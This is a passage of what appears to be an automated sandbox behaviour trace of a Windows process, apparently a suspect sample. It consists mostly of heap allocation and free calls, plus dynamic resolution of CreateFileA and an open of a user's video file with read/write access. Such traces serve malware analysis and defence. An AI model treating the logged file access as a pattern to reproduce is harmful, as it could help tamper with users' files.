hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0198.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0198.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0198.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0198.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0198.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0198.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0198.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0198.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0198.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0198.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0198.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0198.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0198.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0198.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0198.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0198.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0198.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0198.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0198.533] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0198.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0198.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0198.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0198.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9ba1c8 [0198.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9ba1c8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0198.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0198.533] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0198.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0198.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0198.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0198.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0198.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0198.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0198.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0198.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba1c8 [0198.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9ba1c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0198.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0198.534] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0198.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0198.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0198.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0198.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0198.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0198.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0198.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0198.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0198.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0198.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0198.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0198.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0198.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0198.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\zEgvJih7.mp4", cchWideChar=58, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 58 [0198.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3a) returned 0x8db138 [0198.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\zEgvJih7.mp4", cchWideChar=58, lpMultiByteStr=0x8db138, cbMultiByte=58, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\zEgvJih7.mp4", lpUsedDefaultChar=0x0) returned 58 [0198.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0198.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0198.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0198.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0198.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0198.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0198.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0198.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0198.535] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\zEgvJih7.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghioo2t\\zegvjih7.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0198.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0198.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0198.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0198.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0198.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0198.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0198.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0198.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0198.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0198.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0198.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0198.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0198.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0198.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0198.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=58, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0198.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x74) returned 0x8afee8 [0198.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=58, lpWideCharStr=0x8afee8, cchWideChar=58 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\zEgvJih7.mp4") returned 58 [0198.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0198.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0198.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8afee8 | out: hHeap=0x8a0000) returned 1 [0198.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0198.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0198.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0198.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0198.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0198.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0198.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0198.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0198.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0198.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0198.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0198.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0198.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0198.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0198.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0198.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0198.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0198.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0198.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0198.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0198.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0198.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0198.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0198.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0198.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0198.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0198.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0198.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0198.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0198.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0198.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0198.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0198.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0198.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0198.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0198.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0198.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0198.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0198.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0198.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0198.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0198.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0198.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0198.538] FreeLibrary (hLibModule=0x75990000) returned 1 [0198.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0198.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0198.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0198.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0198.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0198.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0198.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0198.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0198.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0198.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0198.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0198.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0198.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0198.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0198.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0198.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0198.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0198.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0198.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0198.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0198.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0198.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0198.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0198.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0198.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0198.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0198.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0198.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0198.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0198.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0198.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0198.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0198.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0198.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0198.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0198.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0198.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0198.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0198.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0198.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0198.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0198.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0198.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0198.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0198.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.539] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0198.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0198.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0198.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0198.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0198.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0198.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0198.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0198.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0198.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0198.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0198.540] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0198.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0198.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0198.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0198.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0198.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0198.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0198.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0198.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0198.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0198.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0198.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0198.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0198.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0198.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0198.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0198.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0198.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0198.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0198.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0198.541] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0198.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0198.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0198.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0198.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0198.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0198.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0198.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0198.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0198.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0198.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0198.541] RtlAllocateHeap 